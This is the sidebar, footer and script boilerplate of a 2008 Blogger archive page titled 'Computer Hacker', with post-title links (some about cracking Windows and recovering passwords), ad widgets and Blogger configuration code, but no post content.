<li><a href='http://bens-qiu.blogspot.com/2008/04/membongkar-file-file-terproteksi.html'>Membongkar File-file terproteksi</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/cara-mengcrack-windows-vista-final.html'>Cara Mengcrack Windows Vista Final Release</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/cara-menemukan-password-administrator.html'>Cara Menemukan Password Administrator Windows XP</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/wireless-network-design-expanding-wired.html'>Wireless Network Design - Expanding the Wired Netw...</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/how-to-fix-wireless-network.html'>How To Fix A Wireless Network</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/wireless-network-adapter-problem.html'>Wireless Network Adapter Problem</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/new-technology-of-wireless-router.html'>A New Technology Of Wireless Router</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/configuring-authoritative-time-server.html'>Configuring An Authoritative Time Server On A Wind...</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/going-wireless.html'>Going Wireless</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/wireless-network-adaptor.html'>Wireless Network Adaptor</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/why-use-network-card.html'>Why Use A Network Card</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/environmental-friendly-computers.html'>Environmental Friendly Computers</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/vital-information-about-cat-5-cable.html'>Vital Information about CAT 5 Cable Networks</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/new-managed-wan-acceleration-service.html'>New Managed WAN Acceleration Service offered by Tr...</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/how-networking-can-be-defined.html'>How Networking Can be Defined</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/fix-wireless-network-connection.html'>Fix Wireless Network Connection</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/remote-cctv-monitoring-service-give.html'>Remote CCTV Monitoring service give peace of mind ...</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/network-address-wireless-problem.html'>Network Address Wireless Problem</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/wireless-network-installation-and.html'>Wireless Network Installation and Configuration</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/doing-network-security-right-first-time.html'>Doing Network Security Right The First Time</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/protecting-your-pc-and-network.html'>Protecting Your PC and Network</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/effective-article-writing-for-targeted.html'>Effective Article Writing For Targeted Website Tra...</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/computer-security-practice.html'>Computer Security Practice</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/network-configuration-manager-tools-for.html'>Network Configuration Manager Tools For Efficiency...</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/analysis-of-chinese-network-games.html'>Analysis of Chinese Network Games Market In 2007 a...</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/why-network-monitoring-is-important.html'>Why Network Monitoring Is Important</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/osi-reference-model-and-tcpip.html'>The OSI Reference Model and TCP/IP architecture</a></li> <li><a href='http://bens-qiu.blogspot.com/2008/04/tcpip-architecture-model.html'>TCP/IP architecture model</a></li> </ul> </li> </ul> </li> </ul> </div> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=BlogArchive&widgetId=BlogArchive1&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("BlogArchive1"));' target='configBlogArchive1' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div> </div> <div class='widget LinkList' id='LinkList1'> <h2>Free Download and Article</h2> <div class='widget-content'> <ul> <li><a href='http://www.ilmuwebsite.com'>Ilmu Website</a></li> <li><a href='http://vivaacp.blogspot.com/'>The journey</a></li> <li><a href='http://www.mp3.com/free-music/'>free Music Mp3</a></li> <li><a href='http://www.animewallpapers.com/'>free Picture</a></li> <li><a href='http://www.free-oxygen.blogspot.com/'>free Computer article</a></li> <li><a href='http://www.syd-tt.blogspot.com/'>free Technology article</a></li> <li><a href='http://www.syd-mt.blogspot.com/'>free Movie</a></li> <li><a href='http://www.download-ten.blogspot.com/'>free Music</a></li> <li><a href='http://www.vendygonzales.blogspot.com/'>free IT article</a></li> </ul> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=LinkList&widgetId=LinkList1&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("LinkList1"));' target='configLinkList1' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div> </div><div class='widget HTML' id='HTML10'> <h2 class='title'>Main Musik dot Com</h2> <div class='widget-content'> <a href="http://www.mainmusik.com" title="Download Mp3 Gratis"><img src="http://www.mainmusik.com/templates/Blufun/images/text_logo_215x58.gif" border="0" alt="MainMusik.com" /></a> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=HTML&widgetId=HTML10&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML10"));' target='configHTML10' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div><div class='widget HTML' id='HTML2'> <div class='widget-content'> <script src="http://kumpulblogger.com/sca.php?b=100507" type="text/javascript"></script> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=HTML&widgetId=HTML2&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML2"));' target='configHTML2' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div><div class='widget HTML' id='HTML3'> <h2 class='title'>Link to be Rich</h2> <div class='widget-content'> <script src="http://kumpulblogger.com/dam.php?b=100507" type="text/javascript"> </script> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=HTML&widgetId=HTML3&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML3"));' target='configHTML3' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div><div class='widget HTML' id='HTML6'> <h2 class='title'>Book Shopping</h2> <div class='widget-content'> <a href="http://www.kutukutubuku.com/kumpulblogger/index.html" target="_new"><img src="http://www.kutukutubuku.com/kumpulblogger/kumpulbloggerad.jpg" /></a><br />Masukkan Code ini <strong>K1-8477F6-D</strong><br />untuk berbelanja di KutuKutuBuku.com </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=HTML&widgetId=HTML6&action=editWidget§ionId=sidebar-right-1' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML6"));' target='configHTML6' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div></div> <table border='0' cellpadding='0' cellspacing='0' class='section-columns columns-2'> <tbody> <tr> <td class='first columns-cell'> <div class='sidebar section' id='sidebar-right-2-1'></div> </td> <td class='columns-cell'> <div class='sidebar section' id='sidebar-right-2-2'></div> </td> </tr> </tbody> </table> <div class='sidebar section' id='sidebar-right-3'><div class='widget HTML' id='HTML9'> <div class='widget-content'> <style type="text/css">body {cursor:url("http://www.123cursors.com/freecursors/8145.gif"),default}</style> </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=HTML&widgetId=HTML9&action=editWidget§ionId=sidebar-right-3' onclick='return _WidgetManager._PopupConfig(document.getElementById("HTML9"));' target='configHTML9' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div></div> </aside> </div> </div> </div> <div style='clear: both'></div> <!-- columns --> </div> <!-- main --> </div> </div> <div class='main-cap-bottom cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> <footer> <div class='footer-outer'> <div class='footer-cap-top cap-top'> <div class='cap-left'></div> <div class='cap-right'></div> </div> <div class='fauxborder-left footer-fauxborder-left'> <div class='fauxborder-right footer-fauxborder-right'></div> <div class='region-inner footer-inner'> <div class='foot section' id='footer-1'></div> <table border='0' cellpadding='0' cellspacing='0' class='section-columns columns-2'> <tbody> <tr> <td class='first columns-cell'> <div class='foot section' id='footer-2-1'></div> </td> <td class='columns-cell'> <div class='foot section' id='footer-2-2'></div> </td> </tr> </tbody> </table> <!-- outside of the include in order to lock Attribution widget --> <div class='foot section' id='footer-3'><div class='widget Attribution' id='Attribution1'> <div class='widget-content' style='text-align: center;'> Awesome Inc. template. Powered by <a href='http://www.blogger.com' target='_blank'>Blogger</a>. </div> <div class='clear'></div> <span class='widget-item-control'> <span class='item-control blog-admin'> <a class='quickedit' href='//www.blogger.com/rearrange?blogID=7762973590000180538&widgetType=Attribution&widgetId=Attribution1&action=editWidget§ionId=footer-3' onclick='return _WidgetManager._PopupConfig(document.getElementById("Attribution1"));' target='configAttribution1' title='Edit'> <img alt='' height='18' src='http://img1.blogblog.com/img/icon18_wrench_allbkg.png' width='18'/> </a> </span> </span> <div class='clear'></div> </div></div> </div> </div> <div class='footer-cap-bottom cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> </footer> <!-- content --> </div> </div> <div class='content-cap-bottom cap-bottom'> <div class='cap-left'></div> <div class='cap-right'></div> </div> </div> </div> <script type='text/javascript'> window.setTimeout(function() { document.body.className = document.body.className.replace('loading', ''); }, 10); </script> <script type="text/javascript"> if (window.jstiming) window.jstiming.load.tick('widgetJsBefore'); </script><script type="text/javascript" src="https://www.blogger.com/static/v1/widgets/1093374584-widgets.js"></script> <script type="text/javascript" src="//www.google.com/jsapi"></script> <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script> <script type='text/javascript'> if (typeof(BLOG_attachCsiOnload) != 'undefined' && BLOG_attachCsiOnload != null) { window['blogger_templates_experiment_id'] = "templatesV2";window['blogger_blog_id'] = '7762973590000180538';BLOG_attachCsiOnload('archive_'); }_WidgetManager._Init('//www.blogger.com/rearrange?blogID\x3d7762973590000180538','//bens-qiu.blogspot.com/2008_04_01_archive.html','7762973590000180538'); _WidgetManager._SetDataContext([{'name': 'blog', 'data': {'blogId': '7762973590000180538', 'bloggerUrl': 'http://www.blogger.com', 'title': 'Computer Hacker', 'pageType': 'archive', 'url': 'http://bens-qiu.blogspot.com/2008_04_01_archive.html', 'canonicalUrl': 'http://bens-qiu.blogspot.com/2008_04_01_archive.html', 'canonicalHomepageUrl': 'http://bens-qiu.blogspot.com/', 'homepageUrl': 'http://bens-qiu.blogspot.com/', 'blogspotFaviconUrl': 'http://bens-qiu.blogspot.com/favicon.ico', 'enabledCommentProfileImages': true, 'adultContent': false, 'disableAdSenseWidget': false, 'analyticsAccountNumber': '', 'searchLabel': '', 'searchQuery': '', 'pageName': 'April 2008', 'pageTitle': 'Computer Hacker: April 2008', 'encoding': 'UTF-8', 'locale': 'en', 'localeUnderscoreDelimited': 'en', 'isPrivate': false, 'isMobile': false, 'isMobileRequest': false, 'mobileClass': '', 'isPrivateBlog': false, 'languageDirection': 'ltr', 'feedLinks': '\74link rel\75\42alternate\42 type\75\42application/atom+xml\42 title\75\42Computer Hacker - Atom\42 href\75\42http://bens-qiu.blogspot.com/feeds/posts/default\42 /\76\n\74link rel\75\42alternate\42 type\75\42application/rss+xml\42 title\75\42Computer Hacker - RSS\42 href\75\42http://bens-qiu.blogspot.com/feeds/posts/default?alt\75rss\42 /\76\n\74link rel\75\42service.post\42 type\75\42application/atom+xml\42 title\75\42Computer Hacker - Atom\42 href\75\42http://www.blogger.com/feeds/7762973590000180538/posts/default\42 /\76\n', 'meTag': '', 'openIdOpTag': '', 'latencyHeadScript': '\74script type\75\42text/javascript\42\76(function() { var b\75window,f\75\42chrome\42,g\75\42tick\42,k\75\42jstiming\42;(function(){function d(a){this.t\75{};this.tick\75function(a,d,c){var e\75void 0!\75c?c:(new Date).getTime();this.t[a]\75[e,d];if(void 0\75\75c)try{b.console.timeStamp(\42CSI/\42+a)}catch(h){}};this[g](\42start\42,null,a)}var a;b.performance\46\46(a\75b.performance.timing);var n\75a?new d(a.responseStart):new d;b.jstiming\75{Timer:d,load:n};if(a){var c\75a.navigationStart,h\75a.responseStart;0\74c\46\46h\76\75c\46\46(b[k].srt\75h-c)}if(a){var e\75b[k].load;0\74c\46\46h\76\75c\46\46(e[g](\42_wtsrt\42,void 0,c),e[g](\42wtsrt_\42,\42_wtsrt\42,h),e[g](\42tbsd_\42,\42wtsrt_\42))}try{a\75null,\nb[f]\46\46b[f].csi\46\46(a\75Math.floor(b[f].csi().pageT),e\46\0460\74c\46\46(e[g](\42_tbnd\42,void 0,b[f].csi().startE),e[g](\42tbnd_\42,\42_tbnd\42,c))),null\75\75a\46\46b.gtbExternal\46\46(a\75b.gtbExternal.pageT()),null\75\75a\46\46b.external\46\46(a\75b.external.pageT,e\46\0460\74c\46\46(e[g](\42_tbnd\42,void 0,b.external.startE),e[g](\42tbnd_\42,\42_tbnd\42,c))),a\46\46(b[k].pt\75a)}catch(p){}})();b.tickAboveFold\75function(d){var a\0750;if(d.offsetParent){do a+\75d.offsetTop;while(d\75d.offsetParent)}d\75a;750\76\75d\46\46b[k].load[g](\42aft\42)};var l\75!1;function m(){l||(l\75!0,b[k].load[g](\42firstScrollTime\42))}b.addEventListener?b.addEventListener(\42scroll\42,m,!1):b.attachEvent(\42onscroll\42,m);\n })();\74/script\076', 'mobileHeadScript': '', 'adsenseClientId': 'pub-2131843177478422', 'ieCssRetrofitLinks': '\74!--[if IE]\76\74script type\75\42text/javascript\42 src\75\42https://www.blogger.com/static/v1/jsbin/2616044812-ieretrofit.js\42\76\74/script\76\n\74![endif]--\076', 'view': '', 'dynamicViewsCommentsSrc': '//www.blogblog.com/dynamicviews/4224c15c4e7c9321/js/comments.js', 'dynamicViewsScriptSrc': '//www.blogblog.com/dynamicviews/76f25a6f2e06af76', 'plusOneApiSrc': 'https://apis.google.com/js/plusone.js', 'sf': 'n'}}, {'name': 'skin', 'data': {'vars': {'date_border_size': '0', 'description_font': 'normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif', 'body_background_gradient_cap': 'url(http://www.blogblog.com/1kt/awesomeinc/body_gradient_dark.png)', 'tabs_selected_background_color': '#444444', 'footer_background_gradient': 'none', 'date_background': 'transparent none no-repeat scroll top left', 'widget_border_radius': '0', 'post_title_text_color': '#ffffff', 'widget_font': 'normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif', 'widget_link_hover_color': '#cccccc', 'link_visited_color': '#444444', 'mobile_background_size': 'auto', 'date_space': '30px', 'post_title_font': 'normal bold 22px Arial, Tahoma, Helvetica, FreeSans, sans-serif', 'tabs_text_color': '#ffffff', 'title_separator_border_size': '1px', 'header_background_gradient': 'none', 'widget_outer_background_gradient': 'none', 'widget_link_color': '#888888', 'mobile_button_color': '#ffffff', 'widget_title_font': 'normal bold 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif', 'widget_outer_background_color': 'transparent', 'date_last_border_radius_bottom': '0', 'widget_outer_margin_top': '0', 'shadow_spread': '0', 'title_shadow_spread': '-1px', 'outer_shadow_spread': '0', 'keycolor': '#ffffff', 'image_shadow_spread': '0', 'image_background_color': '#222222', 'header_font': 'normal bold 40px Arial, Tahoma, Helvetica, FreeSans, sans-serif', 'header_background_color': 'transparent', 'date_header_border_radius_top': '0', 'widget_border_bevel_color': '#000000', 'tabs_border_color': '#222222', 'widget_background_color': '#141414', 'date_position': 'static', 'post_first_padding_top': '0', 'tabs_background_gradient': 'none', 'mobile_background_overlay': 'transparent none repeat scroll top left', 'date_border_color': '#222222', 'tabs_background_color': '#141414', 'widget_link_visited_color': '#444444', 'feed_text_color': '#ffffff', 'header_margin_top': '0', 'link_hover_color': '#cccccc', 'date_last_space_bottom': '20px', 'header_margin_bottom': '0', 'date_padding_bottom': '0', 'list_separator_border_size': '1px', 'description_text_color': '#ffffff', 'body_text_color': '#ffffff', 'header_padding_top': '22px', 'post_border_color': '#222222', 'footer_text_color': '#ffffff', 'post_background_color': '#141414', 'pager_space_top': '1em', 'endSide': 'right', 'startSide': 'left', 'body_background_size': 'auto', 'tabs_font': 'normal bold 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif', 'body_font': 'normal normal 13px Arial, Tahoma, Helvetica, FreeSans, sans-serif', 'date_first_border_radius_top': '0', 'date_header_position': '15px', 'date_text_color': '#666666', 'widget_title_text_color': '#ffffff', 'image_border_color': 'transparent', 'separator_outdent': '15px', 'widget_text_color': '#ffffff', 'link_color': '#888888', 'widget_border_color': '#222222', 'pager_border_radius_top': '0', 'feed_link_color': '#888888', 'header_text_color': '#ffffff', 'footer_background_color': '#141414', 'widget_padding_top': '8px', 'feed_link_visited_color': '#444444', 'feed_link_hover_color': '#cccccc', 'date_font': 'normal normal 14px Arial, Tahoma, Helvetica, FreeSans, sans-serif', 'tabs_selected_text_color': '#ffffff', 'date_side': 'right', 'post_border_bevel_color': '#222222', 'widget_padding_side': '15px', 'body_background_color': '#000000', 'image_border_radius': '0', 'pager_background_color': '#141414', 'widget_alternate_text_color': '#666666'}, 'override': ''}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\75classic'}, 'flipcard': {'name': 'flipcard', 'url': '?view\75flipcard'}, 'magazine': {'name': 'magazine', 'url': '?view\75magazine'}, 'mosaic': {'name': 'mosaic', 'url': '?view\75mosaic'}, 'sidebar': {'name': 'sidebar', 'url': '?view\75sidebar'}, 'snapshot': {'name': 'snapshot', 'url': '?view\75snapshot'}, 'timeslide': {'name': 'timeslide', 'url': '?view\75timeslide'}}}]); _WidgetManager._RegisterWidget('_CustomSearchView', new _WidgetInfo('CustomSearch1', 'crosscol', null, document.getElementById('CustomSearch1'), {'title': 'Search This Blog', 'includeBlog': true, 'includePostLinks': true, 'includeWeb': true, 'linkLists': [{'id': 'LinkList1', 'title': 'Free Download and Article'}], 'blogUrl': 'http://bens-qiu.blogspot.com/', 'loadingMsg': 'Loading...', 'thisBlogMsg': 'This Blog', 'linkedFromHereMsg': 'Linked From Here', 'theWebMsg': 'The Web', 'backgroundColor': '#141414', 'textColor': '#ffffff', 'dateColor': '#666666', 'linkColor': '#888888', 'urlColor': '#888888', 'visitedLinkColor': '#444444', 'borderColor': '#666666', 'activeBorderColor': '#666666'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML9', 'sidebar-right-3', null, document.getElementById('HTML9'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_AttributionView', new _WidgetInfo('Attribution1', 'footer-3', null, document.getElementById('Attribution1'), {'attribution': 'Awesome Inc. template. Powered by \74a href\75\47http://www.blogger.com\47 target\75\47_blank\47\76Blogger\74/a\76.'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HeaderView', new _WidgetInfo('Header1', 'header', null, document.getElementById('Header1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', null, document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/3694023982-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/2392111094-lightbox_bundle.css'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_GadgetView', new _WidgetInfo('Gadget3', 'main', null, document.getElementById('Gadget3'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_GadgetView', new _WidgetInfo('Gadget7', 'main', null, document.getElementById('Gadget7'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_GadgetView', new _WidgetInfo('Gadget1', 'main', null, document.getElementById('Gadget1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML8', 'sidebar-right-1', null, document.getElementById('HTML8'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML5', 'sidebar-right-1', null, document.getElementById('HTML5'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_AdSenseView', new _WidgetInfo('AdSense1', 'sidebar-right-1', null, document.getElementById('AdSense1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_GadgetView', new _WidgetInfo('Gadget5', 'sidebar-right-1', null, document.getElementById('Gadget5'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML7', 'sidebar-right-1', null, document.getElementById('HTML7'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_FollowersView', new _WidgetInfo('Followers1', 'sidebar-right-1', null, document.getElementById('Followers1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML1', 'sidebar-right-1', null, document.getElementById('HTML1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML4', 'sidebar-right-1', null, document.getElementById('HTML4'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_BlogArchiveView', new _WidgetInfo('BlogArchive1', 'sidebar-right-1', null, document.getElementById('BlogArchive1'), {'languageDirection': 'ltr'}, 'displayModeFull')); _WidgetManager._RegisterWidget('_LinkListView', new _WidgetInfo('LinkList1', 'sidebar-right-1', null, document.getElementById('LinkList1'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML10', 'sidebar-right-1', null, document.getElementById('HTML10'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML2', 'sidebar-right-1', null, document.getElementById('HTML2'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML3', 'sidebar-right-1', null, document.getElementById('HTML3'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_HTMLView', new _WidgetInfo('HTML6', 'sidebar-right-1', null, document.getElementById('HTML6'), {}, 'displayModeFull')); _WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', null, document.getElementById('Navbar1'), {}, 'displayModeFull')); </script> </body> </html>